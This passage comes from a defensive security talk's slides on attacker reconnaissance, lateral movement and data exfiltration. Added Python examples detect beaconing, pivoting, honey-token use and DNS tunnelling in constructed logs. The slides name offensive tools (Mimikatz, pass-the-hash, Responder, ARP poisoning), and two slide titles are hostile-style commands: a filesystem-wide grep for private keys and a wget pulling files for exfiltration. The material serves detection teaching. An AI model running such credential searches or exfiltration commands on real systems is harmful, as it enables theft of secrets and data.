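Slide 24 describes the SIEM logic in words only. The following is an added example, not code from the deck or from LogRhythm: it builds the per-host baseline (distinct destinations, request count, bytes) from one window of constructed proxy log lines, then checks a later window for destinations outside the baseline and for one destination being contacted at a near-constant interval, which is how a periodic beacon looks in proxy data. The log format, host names, user names and domains are all constructed for the example.

```python
"""Per-host web-activity baseline and beacon detection over proxy logs.

Added example (not from the slides).  Hypothetical proxy log format:
    <ISO time> <src_host> <user> <dest_host> <bytes>
"""
from collections import defaultdict
from datetime import datetime
from statistics import pstdev

# Constructed "known good" window used to build the baseline.
BASELINE_LOG = """\
2015-03-02T09:00:12 ws-101 alice intranet.example.local 5120
2015-03-02T09:03:40 ws-101 alice www.example-news.test 88210
2015-03-02T09:15:05 ws-101 alice mail.example.local 2048
2015-03-02T10:02:33 ws-101 alice www.example-news.test 90112
2015-03-02T11:45:09 ws-101 alice intranet.example.local 4096
2015-03-02T13:20:41 ws-101 alice docs.example-vendor.test 30211
"""

# Constructed later window: ws-101 now contacts one new host every ~300 s.
NEW_LOG = """\
2015-03-03T09:00:00 ws-101 alice cdn-update.example-bad.test 512
2015-03-03T09:05:01 ws-101 alice cdn-update.example-bad.test 512
2015-03-03T09:09:59 ws-101 alice cdn-update.example-bad.test 512
2015-03-03T09:15:02 ws-101 alice cdn-update.example-bad.test 512
2015-03-03T09:19:58 ws-101 alice cdn-update.example-bad.test 512
2015-03-03T09:25:00 ws-101 alice cdn-update.example-bad.test 512
2015-03-03T09:02:15 ws-101 alice intranet.example.local 5120
2015-03-03T09:31:40 ws-101 alice www.example-news.test 87000
2015-03-03T09:01:10 ws-102 bob www.example-news.test 91000
2015-03-03T09:40:22 ws-102 bob www.example-news.test 91000
2015-03-03T13:12:22 ws-102 bob intranet.example.local 4096
"""


def parse_log(text):
    """Parse the hypothetical proxy format into a list of event dicts."""
    events = []
    for line in text.splitlines():
        ts, host, user, dest, nbytes = line.split()
        events.append({"ts": datetime.fromisoformat(ts), "host": host,
                       "user": user, "dest": dest, "bytes": int(nbytes)})
    return events


def build_baseline(events):
    """Map host -> {"dests": set, "requests": count, "bytes": total}."""
    base = defaultdict(lambda: {"dests": set(), "requests": 0, "bytes": 0})
    for e in events:
        b = base[e["host"]]
        b["dests"].add(e["dest"])
        b["requests"] += 1
        b["bytes"] += e["bytes"]
    return dict(base)


def new_destinations(baseline, events):
    """Destinations each host contacted that are absent from its baseline.
    A host with no baseline at all gets every destination reported."""
    seen = defaultdict(set)
    for e in events:
        known = baseline.get(e["host"], {}).get("dests", set())
        if e["dest"] not in known:
            seen[e["host"]].add(e["dest"])
    return {h: sorted(d) for h, d in seen.items()}


def detect_beacons(events, min_hits=5, max_cv=0.10):
    """Return (host, dest, mean_interval_s) for host/dest pairs contacted at
    least min_hits times whose inter-request intervals have a coefficient of
    variation (stddev / mean) below max_cv, i.e. near-clockwork timing."""
    times = defaultdict(list)
    for e in events:
        times[(e["host"], e["dest"])].append(e["ts"])
    found = []
    for (host, dest), ts in times.items():
        if len(ts) < min_hits:
            continue
        ts.sort()
        gaps = [(b - a).total_seconds() for a, b in zip(ts, ts[1:])]
        mean_gap = sum(gaps) / len(gaps)
        if mean_gap > 0 and pstdev(gaps) / mean_gap < max_cv:
            found.append((host, dest, round(mean_gap, 1)))
    return found


if __name__ == "__main__":
    base = build_baseline(parse_log(BASELINE_LOG))
    new = parse_log(NEW_LOG)
    print("new destinations:", new_destinations(base, new))
    print("beacons:", detect_beacons(new))
```

The jitter threshold is the important knob: real beacons usually add some randomness to their sleep, so `max_cv` should be tuned against the organization's own proxy data rather than left at 10%, and hosts with no baseline at all (new machines) are reported in full rather than silently skipped.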
• 25. Reconnaissance
  • Ping sweeps, service discovery, etc. – NO
    • Why make unnecessary noise?
  • Instead => access network shares, web apps, and services
    • Passively gather information using available resources…
  Image: http://macheads101.com/pages/pics/download_pics/mac/portscan.png
• 26. Lateral Movement
  • Dump Local System Hashes
    • Maybe crack them, maybe it’s not even necessary…
    • Pass the Hash (PtH)
  • Dump plain text passwords
    • Mimikatz -- FTW!
  • Act as an internal employee -- use legitimate means to access resources.
• 27. Uncovering Internal Reconnaissance and Pivoting
  • Security Operations Goal => Reduce MTTD and MTTR
    • MTTD – Mean Time to Detect
    • MTTR – Mean Time to Respond
  • Set Traps => Honeypot / Honey Token access
  • Overt Clues => Modification of user / file / group permissions and pivoting evidence
  • Subtle Clues => VPN access from disparate geographical locations
  • Missed Opportunities => Once inside, they are now an ‘employee’…
• 28. Lateral Movement Log Traces
  • Microsoft’s granular Event Identification schema (EVID) in conjunction with environment information provides analysts with plenty of information to track attackers once they have breached the perimeter.
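Slides 27 and 28 name the clues (honey token access, permission changes, pivoting evidence) and say Windows event IDs carry enough detail to track them, without showing a rule. The following is an added example, not code from the deck or from LogRhythm, that correlates three of those clues over constructed Windows Security events. The event IDs are the standard Windows ones (4624 successful logon, 4625 failed logon, 4728/4732/4756 member added to a global/local/universal group) and logon type 3 is a network logon; the pipe-delimited line format, the decoy account name and every host and IP address are constructed for the example, and real events carry these values in separate EventData fields (IpAddress, LogonType, TargetUserName, MemberName, etc.).

```python
"""Windows Security-log correlation for pivoting, honey token use and group
permission changes.  Added example, not from the slides.

Simplified constructed event line:
    <ISO time>|<EventID>|<LogonType or ->|<account>|<source IP or ->|<computer>
"""
from datetime import datetime

# Constructed events: one workstation logs on to four servers in ~2.5 minutes,
# trips a decoy account along the way, then adds an account to a group.
EVENTS_LOG = """\
2015-03-03T10:01:05|4624|3|jdoe|10.0.5.23|FILESRV01
2015-03-03T10:01:40|4624|3|jdoe|10.0.5.23|HRSRV02
2015-03-03T10:02:12|4624|3|jdoe|10.0.5.23|DEVSRV03
2015-03-03T10:02:50|4625|3|svc_backup_hny|10.0.5.23|DC01
2015-03-03T10:03:30|4624|3|jdoe|10.0.5.23|DC01
2015-03-03T10:05:00|4728|-|jdoe|10.0.5.23|DC01
2015-03-03T10:20:00|4624|3|asmith|10.0.5.40|FILESRV01
2015-03-03T11:15:00|4624|2|asmith|-|WS-040
"""

HONEYTOKEN_ACCOUNTS = {"svc_backup_hny"}   # constructed decoy account (honey token)
GROUP_CHANGE_EVENTS = {4728, 4732, 4756}   # member added to global/local/universal group


def parse_events(text):
    """Parse the simplified line format into event dicts."""
    events = []
    for line in text.splitlines():
        ts, eid, ltype, account, ip, computer = line.split("|")
        events.append({"ts": datetime.fromisoformat(ts), "eid": int(eid),
                       "logon_type": None if ltype == "-" else int(ltype),
                       "account": account, "ip": ip, "computer": computer})
    return events


def detect_pivoting(events, window_seconds=600, min_targets=3):
    """Flag (source IP, account) pairs with network logons (4624, type 3) to at
    least min_targets distinct computers inside any window_seconds window."""
    by_actor = {}
    for e in events:
        if e["eid"] == 4624 and e["logon_type"] == 3 and e["ip"] != "-":
            by_actor.setdefault((e["ip"], e["account"]), []).append(e)
    hits = []
    for (ip, account), evs in by_actor.items():
        evs.sort(key=lambda e: e["ts"])
        for i in range(len(evs)):            # slide a window from each event
            targets = set()
            for e in evs[i:]:
                if (e["ts"] - evs[i]["ts"]).total_seconds() > window_seconds:
                    break
                targets.add(e["computer"])
            if len(targets) >= min_targets:
                hits.append((ip, account, sorted(targets)))
                break                        # one finding per actor is enough
    return hits


def detect_honeytoken_use(events, honeytokens=HONEYTOKEN_ACCOUNTS):
    """Any logon attempt, successful or failed, against a decoy account is a
    trap trip: nothing legitimate should ever touch it."""
    return [(e["ts"].isoformat(), e["eid"], e["account"], e["ip"], e["computer"])
            for e in events
            if e["eid"] in (4624, 4625) and e["account"] in honeytokens]


def detect_group_changes(events):
    """Overt clue from slide 27: group membership modifications."""
    return [(e["ts"].isoformat(), e["eid"], e["account"], e["computer"])
            for e in events if e["eid"] in GROUP_CHANGE_EVENTS]


def run_all(text=EVENTS_LOG):
    events = parse_events(text)
    return {"pivoting": detect_pivoting(events),
            "honeytoken": detect_honeytoken_use(events),
            "group_changes": detect_group_changes(events)}


if __name__ == "__main__":
    for name, findings in run_all().items():
        print(name, findings)
```

The three detectors are deliberately independent so each can be tuned on its own: the pivoting rule needs a window and a target count that fit the environment (an admin jump host will legitimately hit many servers and belongs on an allow list), while the honey token rule has no threshold at all because a single touch is already conclusive.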
• 29. Passive Data Extraction
  • Well Poisoning via UNC Paths
  • SMB Replay
  • Help Desk Tickets
  • Responder – By Spider Labs
  • Keylogging
• 30. Passive Traffic Analysis
  • Analyze / capture anything that comes across the wire.
  • ARP poison hosts of interest, take over switches/routers, etc.
  Image: https://i.chzbgr.com/maxW500/5579525376/h7D009AE4/
• 31. # grep -rhi ‘private key’ /* && echo “Identify Key Resources”
  • Keys / Certificates / Passwords
  • File Shares and Databases
  • Intellectual Property
  • Domain Controllers / Exchange / etc.
  • Business Leaders – CXO, Director, VP, etc.
  • Administrative Assistants
  Image: http://www.mobilemarketingwatch.com/wordpress/wp-content/uploads/2011/07/Top-Secret-Tip-To-Pick-SMS-Keyword.jpeg
• 32. # wget http://target/files.tgz && echo “Data Exfiltration”
  • Target data identified, gathered, and moved out of the environment.
  • Data is normally leaked in a ‘hidden’ or modified format; rarely is the actual document extracted.
    • Emails and Employee PII
    • Intellectual Property
    • Trade Secrets
  Image: http://www.csee.umbc.edu/wp-content/uploads/2013/04/ex.jpg
• 33. Data Exfiltration is Often Not ‘Advanced’
• 34. Catching Data Exfiltration
  • Granular restrictions on sensitive files and directories to specific groups or individuals; alert on any abnormal file access / read / write / etc.
  • DNS exfiltration or sometimes even ICMP Tunneling in high security environments
  • Non-SSL over ports 443 / 8443, encrypted TCP over ports 80 / 8080
  • Abnormal web server activity, newly created files, etc.
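Slide 34 lists DNS exfiltration and non-SSL traffic on port 443 as things to catch, without saying how. The following is an added example, not code from the deck or from LogRhythm, that implements both checks offline: it scores constructed DNS query logs for tunnelling-style lookups (many distinct, long, high-entropy subdomains under one parent domain from one host) and tests whether the first bytes of a flow on TCP/443 are actually a TLS ClientHello record. Every host, domain, log line and packet prefix is constructed for the example, and the DNS log format is hypothetical.

```python
"""Two exfiltration checks from slide 34, as added example code (not from the
deck): DNS tunnelling scoring and a "is this really TLS on 443?" test.
"""
import hashlib
import math
from collections import defaultdict

# Constructed DNS query log, one "<src_ip> <qname>" per line.  25 lookups of
# long hex labels under one parent domain from one host stand in for a tunnel.
_EXFIL_NAMES = [
    hashlib.sha256(f"chunk{i}".encode()).hexdigest()[:40] + ".t.example-exfil.test"
    for i in range(25)
]
DNS_LOG = "\n".join(
    [f"10.0.5.23 {name}" for name in _EXFIL_NAMES]
    + ["10.0.5.23 www.example-news.test",
       "10.0.5.23 intranet.example.local",
       "10.0.5.40 www.example-news.test",
       "10.0.5.40 mail.example.local",
       "10.0.5.40 cdn.example-news.test"]
)

# Constructed first bytes of three flows seen on TCP/443.
PORT443_FLOWS = [
    ("10.0.5.40", "203.0.113.10", b"\x16\x03\x01\x00\xa5\x01\x00\x00\xa1\x03\x03"),  # real TLS ClientHello prefix
    ("10.0.5.23", "203.0.113.20", b"GET /update HTTP/1.1\r\nHost: 203.0.113.20\r\n"),  # plain HTTP on 443
    ("10.0.5.23", "203.0.113.30", b"\x00\x00\x00\x10\x01\x02\x03\x04\xde\xad"),          # custom binary protocol
]


def shannon_entropy(s):
    """Bits per character of s (0.0 for empty or single-symbol strings)."""
    if not s:
        return 0.0
    counts = defaultdict(int)
    for ch in s:
        counts[ch] += 1
    n = len(s)
    return -sum(c / n * math.log2(c / n) for c in counts.values())


def split_qname(qname):
    """Return (subdomain labels joined, parent) where parent = last two labels."""
    labels = qname.rstrip(".").split(".")
    return "".join(labels[:-2]), ".".join(labels[-2:])


def score_dns(log_text, min_unique=10, min_avg_len=30, min_entropy=3.0):
    """Group queries by (src, parent domain) and flag groups with many
    distinct subdomains that are long or high-entropy on average."""
    groups = defaultdict(set)
    for line in log_text.splitlines():
        src, qname = line.split()
        sub, parent = split_qname(qname)
        groups[(src, parent)].add(sub)
    flagged = []
    for (src, parent), subs in groups.items():
        if len(subs) < min_unique:
            continue
        avg_len = sum(len(s) for s in subs) / len(subs)
        avg_ent = sum(shannon_entropy(s) for s in subs) / len(subs)
        if avg_len >= min_avg_len or avg_ent >= min_entropy:
            flagged.append({"src": src, "parent": parent, "unique": len(subs),
                            "avg_len": round(avg_len, 1),
                            "avg_entropy": round(avg_ent, 2)})
    return flagged


def looks_like_tls_client_hello(payload):
    """True if the bytes start a TLS Handshake record (content type 0x16,
    version 3.x) whose first handshake message is a ClientHello (0x01)."""
    if len(payload) < 6:
        return False
    return (payload[0] == 0x16 and payload[1] == 0x03
            and payload[2] <= 0x04 and payload[5] == 0x01)


def classify_port443_flows(flows):
    """Return [(src, dst, verdict)]; anything but 'tls' on 443 deserves a look."""
    out = []
    for src, dst, first_bytes in flows:
        if looks_like_tls_client_hello(first_bytes):
            verdict = "tls"
        elif first_bytes[:4] in (b"GET ", b"POST", b"HEAD", b"PUT "):
            verdict = "plaintext-http"
        else:
            verdict = "unknown-binary"
        out.append((src, dst, verdict))
    return out


if __name__ == "__main__":
    print("dns:", score_dns(DNS_LOG))
    print("443:", classify_port443_flows(PORT443_FLOWS))
```

The DNS scorer keys on the parent domain rather than the full name because a tunnel rotates the leading labels on every query; the thresholds are starting points and should be calibrated against the organization's own resolver logs, where CDN and anti-spam lookups can also produce long labels. The TLS check only proves that a handshake was attempted, so pairing it with the decrypted-SSL visibility slide 24 asks for is what actually closes the gap.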
• 35. It all comes down to Event Correlation
• 37. Closing Thoughts…
  • Don’t be hard on the outside, soft and chewy on the inside…
  • Implement Layer 3 (network) Segmentation and Least User Privilege
  • Understand your environment and log data so that you can accurately correlate physical and cyber events
  • Implement URL filtering, stateful packet inspection, and binary analysis
  • Actively alert on and respond at the earliest signs of lateral movement and reconnaissance observed within your environment
  • The earlier you can detect attackers the better…
• 38. Thank You!
  QUESTIONS?
  Greg Foss
  OSCP, GAWN, GPEN, GWAPT, GCIH, CEH
  Senior Security Research Engineer
  Greg.Foss[at]logrhythm.com
  @heinzarelli